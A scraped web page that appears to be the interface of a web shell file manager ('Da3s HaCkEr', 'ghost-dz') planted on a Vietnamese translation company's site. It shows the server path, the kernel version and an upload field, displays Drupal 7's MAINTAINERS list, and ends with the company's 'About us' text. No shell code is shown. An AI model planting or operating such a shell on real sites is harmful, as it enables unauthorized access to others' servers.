Ich Nhi
Uploader

Comments

Uploader by ghost-dzLinux A2Z 2.6.32-44-pve #1 SMP Sun Mar 13 17:00:54 CET 2016 x86_64
? HaTRk File Manager

Da3s HaCkEr File Manager

Current Path : /home/phiendichtienghan.com/public_html/
Upload File :
Current File : /home/phiendichtienghan.com/public_html/MAINTAINERS.txt

Drupal core is built and maintained by the Drupal project community. Everyone is
encouraged to submit issues and changes (patches) to improve Drupal, and to
contribute in other ways -- see https://www.drupal.org/contribute to find out
how.

Branch maintainers
------------------

The Drupal Core branch maintainers oversee the development of Drupal as a whole.
The branch maintainers for Drupal 7 are:

- Dries Buytaert 'dries' https://www.drupal.org/u/dries
- Angela Byron 'webchick' https://www.drupal.org/u/webchick
- Fabian Franz 'Fabianx' https://www.drupal.org/u/fabianx
- David Rothstein 'David_Rothstein' https://www.drupal.org/u/david_rothstein
- Stefan Ruijsenaars 'stefan.r' https://www.drupal.org/u/stefanr-0


Component maintainers
---------------------

The Drupal Core component maintainers oversee the development of Drupal
subsystems. See https://www.drupal.org/contribute/core-maintainers for more
information on their responsibilities, and to find out how to become a component
maintainer. Current component maintainers for Drupal 7:

Ajax system
- Alex Bronstein 'effulgentsia' https://www.drupal.org/u/effulgentsia
- Earl Miles 'merlinofchaos' https://www.drupal.org/u/merlinofchaos

Base system
- Damien Tournoud 'DamZ' https://www.drupal.org/u/damien-tournoud
- Moshe Weitzman 'moshe weitzman' https://www.drupal.org/u/moshe-weitzman

Batch system
- Yves Chedemois 'yched' https://www.drupal.org/u/yched

Cache system
- Damien Tournoud 'DamZ' https://www.drupal.org/u/damien-tournoud
- Nathaniel Catchpole 'catch' https://www.drupal.org/u/catch

Cron system
- Derek Wright 'dww' https://www.drupal.org/u/dww

Database system
- Larry Garfield 'Crell' https://www.drupal.org/u/crell

 - MySQL driver
  - Larry Garfield 'Crell' https://www.drupal.org/u/crell
  - David Strauss 'David Strauss' https://www.drupal.org/u/david-strauss

 - PostgreSQL driver
  - Damien Tournoud 'DamZ' https://www.drupal.org/u/damien-tournoud
  - Josh Waihi 'fiasco' https://www.drupal.org/u/josh-waihi

 - Sqlite driver
  - Damien Tournoud 'DamZ' https://www.drupal.org/u/damien-tournoud

Database update system
- Ashok Modi 'BTMash' https://www.drupal.org/u/btmash

Entity system
- Wolfgang Ziegler 'fago' https://www.drupal.org/u/fago
- Nathaniel Catchpole 'catch' https://www.drupal.org/u/catch
- Franz Heinzmann 'Frando' https://www.drupal.org/u/frando

File system
- Andrew Morton 'drewish' https://www.drupal.org/u/drewish
- Aaron Winborn 'aaron' https://www.drupal.org/u/aaron

Form system
- Alex Bronstein 'effulgentsia' https://www.drupal.org/u/effulgentsia
- Wolfgang Ziegler 'fago' https://www.drupal.org/u/fago
- Daniel F. Kudwien 'sun' https://www.drupal.org/u/sun
- Franz Heinzmann 'Frando' https://www.drupal.org/u/frando

Image system
- Andrew Morton 'drewish' https://www.drupal.org/u/drewish
- Nathan Haug 'quicksketch' https://www.drupal.org/u/quicksketch

Install system
- David Rothstein 'David_Rothstein' https://www.drupal.org/u/david_rothstein

JavaScript
- Théodore Biadala 'nod_' https://www.drupal.org/u/nod_
- Steve De Jonghe 'seutje' https://www.drupal.org/u/seutje

Language system
- Francesco Placella 'plach' https://www.drupal.org/u/plach
- Daniel F. Kudwien 'sun' https://www.drupal.org/u/sun

Lock system
- Damien Tournoud 'DamZ' https://www.drupal.org/u/damien-tournoud

Mail system
- ?

Markup
- Jacine Luisi 'Jacine' https://www.drupal.org/u/jacine
- Daniel F. Kudwien 'sun' https://www.drupal.org/u/sun

Menu system
- Peter Wolanin 'pwolanin' https://www.drupal.org/u/pwolanin

Path system
- Dave Reid 'davereid' https://www.drupal.org/u/dave-reid
- Nathaniel Catchpole 'catch' https://www.drupal.org/u/catch

Render system
- Moshe Weitzman 'moshe weitzman' https://www.drupal.org/u/moshe-weitzman
- Alex Bronstein 'effulgentsia' https://www.drupal.org/u/effulgentsia
- Franz Heinzmann 'Frando' https://www.drupal.org/u/frando

Theme system
- Earl Miles 'merlinofchaos' https://www.drupal.org/u/merlinofchaos
- Alex Bronstein 'effulgentsia' https://www.drupal.org/u/effulgentsia
- Joon Park 'dvessel' https://www.drupal.org/u/dvessel
- John Albin Wilkins 'JohnAlbin' https://www.drupal.org/u/johnalbin

Token system
- Dave Reid 'davereid' https://www.drupal.org/u/dave-reid

XML-RPC system
- Frederic G. Marand 'fgm' https://www.drupal.org/u/fgm


Topic coordinators
------------------

Accessibility
- Everett Zufelt 'Everett Zufelt' https://www.drupal.org/u/everett-zufelt
- Brandon Bowersox-Johnson 'bowersox' https://www.drupal.org/u/bowersox

Documentation
- Jennifer Hodgdon 'jhodgdon' https://www.drupal.org/u/jhodgdon

Translations
- Gerhard Killesreiter 'killes' https://www.drupal.org/u/gerhard-killesreiter

User experience and usability
- Roy Scholten 'yoroy' https://www.drupal.org/u/yoroy
- Bojhan Somers 'Bojhan' https://www.drupal.org/u/bojhan

Node Access
- Moshe Weitzman 'moshe weitzman' https://www.drupal.org/u/moshe-weitzman
- Ken Rickard 'agentrickard' https://www.drupal.org/u/agentrickard
- Jess Myrbo 'xjm' https://www.drupal.org/u/xjm


Security team
-----------------

To report a security issue, see: https://www.drupal.org/security-team/report-issue

The Drupal security team provides Security Advisories for vulnerabilities,
assists developers in resolving security issues, and provides security
documentation. See https://www.drupal.org/security-team for more information.
The security team lead is:

- Michael Hess 'mlhess' https://www.drupal.org/u/mlhess


Module maintainers
------------------

Aggregator module
- ?

Block module
- John Albin Wilkins 'JohnAlbin' https://www.drupal.org/u/johnalbin

Blog module
- ?

Book module
- Peter Wolanin 'pwolanin' https://www.drupal.org/u/pwolanin

Color module
- ?

Comment module
- Nathaniel Catchpole 'catch' https://www.drupal.org/u/catch

Contact module
- Dave Reid 'davereid' https://www.drupal.org/u/dave-reid

Contextual module
- Daniel F. Kudwien 'sun' https://www.drupal.org/u/sun

Dashboard module
- ?

Database logging module
- Khalid Baheyeldin 'kbahey' https://www.drupal.org/u/kbahey

Field module
- Yves Chedemois 'yched' https://www.drupal.org/u/yched
- Barry Jaspan 'bjaspan' https://www.drupal.org/u/bjaspan

Field UI module
- Yves Chedemois 'yched' https://www.drupal.org/u/yched

File module
- Aaron Winborn 'aaron' https://www.drupal.org/u/aaron

Filter module
- Daniel F. Kudwien 'sun' https://www.drupal.org/u/sun

Forum module
- Lee Rowlands 'larowlan' https://www.drupal.org/u/larowlan

Help module
- ?

Image module
- Nathan Haug 'quicksketch' https://www.drupal.org/u/quicksketch

Locale module
- Gábor Hojtsy 'Gábor Hojtsy' https://www.drupal.org/u/gábor-hojtsy

Menu module
- ?

Node module
- Moshe Weitzman 'moshe weitzman' https://www.drupal.org/u/moshe-weitzman
- David Strauss 'David Strauss' https://www.drupal.org/u/david-strauss

OpenID module
- Vojtech Kusy 'wojtha' https://www.drupal.org/u/wojtha
- Christian Schmidt 'c960657' https://www.drupal.org/u/c960657
- Damien Tournoud 'DamZ' https://www.drupal.org/u/damien-tournoud

Overlay module
- Katherine Senzee 'ksenzee' https://www.drupal.org/u/ksenzee

Path module
- Dave Reid 'davereid' https://www.drupal.org/u/dave-reid

PHP module
- ?

Poll module
- Andrei Mateescu 'amateescu' https://www.drupal.org/u/amateescu

Profile module
- ?

RDF module
- Stéphane Corlosquet 'scor' https://www.drupal.org/u/scor

Search module
- Doug Green 'douggreen' https://www.drupal.org/u/douggreen

Shortcut module
- David Rothstein 'David_Rothstein' https://www.drupal.org/u/david_rothstein

Simpletest module
- Jimmy Berry 'boombatower' https://www.drupal.org/u/boombatower

Statistics module
- Tim Millwood 'timmillwood' https://www.drupal.org/u/timmillwood

Syslog module
- Khalid Baheyeldin 'kbahey' https://www.drupal.org/u/kbahey

System module
- ?

Taxonomy module
- Jess Myrbo 'xjm' https://www.drupal.org/u/xjm
- Nathaniel Catchpole 'catch' https://www.drupal.org/u/catch
- Benjamin Doherty 'bangpound' https://www.drupal.org/u/bangpound

Toolbar module
- ?

Tracker module
- David Strauss 'David Strauss' https://www.drupal.org/u/david-strauss

Translation module
- Francesco Placella 'plach' https://www.drupal.org/u/plach

Trigger module
- ?

Update module
- Derek Wright 'dww' https://www.drupal.org/u/dww

User module
- Moshe Weitzman 'moshe weitzman' https://www.drupal.org/u/moshe-weitzman
- David Strauss 'David Strauss' https://www.drupal.org/u/david-strauss


Theme maintainers
-----------------

Bartik theme
- Jen Simmons 'jensimmons' https://www.drupal.org/u/jensimmons
- Jeff Burns 'Jeff Burnz' https://www.drupal.org/u/jeff-burnz

Garland theme
- John Albin Wilkins 'JohnAlbin' https://www.drupal.org/u/johnalbin

Seven theme
- Jeff Burns 'Jeff Burnz' https://www.drupal.org/u/jeff-burnz

Stark theme
- John Albin Wilkins 'JohnAlbin' https://www.drupal.org/u/johnalbin

Da3s File Manager Version 1.0, Coded By Da3s HaCkEr
Email: R0@hotmail.com

Về chúng tôi

Là một trong những công ty dịch thuật, phiên dịch chuyên nghiệp hàng đầu tại VN. Với khả năng dịch trên 36 thứ tiếng chúng tôi luôn tự tin dịch cho quý khách với độ chính xác cao trong khoảng thời gian nhanh nhất. Trong lĩnh vực dịch thuật với đội ngũ dịch giả viên đông đảo và nhiều kinh nghiệm trong nghề luôn đem đến dịch vụ tốt nhất làm vừa lòng những khách hàng khó tính nhất. Công ty có đội ngũ 500 cán bộ có trình độ đại học trở lên, có chuyên môn sâu về chuyên ngành, bao gồm toàn thể nhân viên và cộng tác viên là giáo sư, tiến sỹ, giảng viên các trường đại học và cộng tác viên làm việc tại các Đại sứ quán, Bộ ngoại giao, Viện nghiên cứu, các chuyên gia nước ngoài có năng lực, có chuyên môn, đầy nhiệt huyết và luôn mong muốn thực hiện công việc với lòng yêu nghề, chất lượng và hiệu quả cao nhất. Hệ thống thông tin liên lạc được thiết lập bằng nền tảng công nghệ hiện đại đáp ứng nhanh nhất mọi yêu cầu của khách hàng trên phạm vi toàn cầu. Chúng tôi nhận dịch thuật, Phiên dịch, dịch công chứng... trên 36 ngôn ngữ. Từ các ngôn ngữ thông dụng như Tiếng Anh, Pháp, Nhật, Nga, Trung, Đức, Hàn, Italia, Tây Ban Nha, Bồ Đào Nha…đến các ngôn ngữ ít sử dụng tại Việt Nam như Arập, Ba Lan, Phần Lan, Thái Lan, Hà Lan, Hungari, Rumani, Ucraina, Séc, Slovakia, La Tinh, Thuỵ Điển, My-an-ma, Đan Mạch, Lào, Campuchia, Khơ-me, Inđônêxia, Malayxia, Brunei, Iran,… Chúng tôi hoạt động dựa trên nền tảng đạo đức nghề nghiệp, sự hài lòng của khách hàng là mục tiêu mà tất cả những ai làm việc tại dịch thuật A2Z luôn hướng tới, với tinh thần và trách nhiệm cao trong công việc chúng tôi cam kết với khách hàng cho ra đời những tác phẩm dịch thuật chất lượng nhất với giá cả cạnh tranh nhất. ♦ Đội ngũ biên phiên dịch A2Z chuyên nghiệp ♦ Quy trình đảm bảo chất lượng dịch thuật ♦ Hoàn thành đúng thời hạn ♦ Giá dịch cạnh tranh ♦ Dịch vụ khách hàng chuyên nghiệp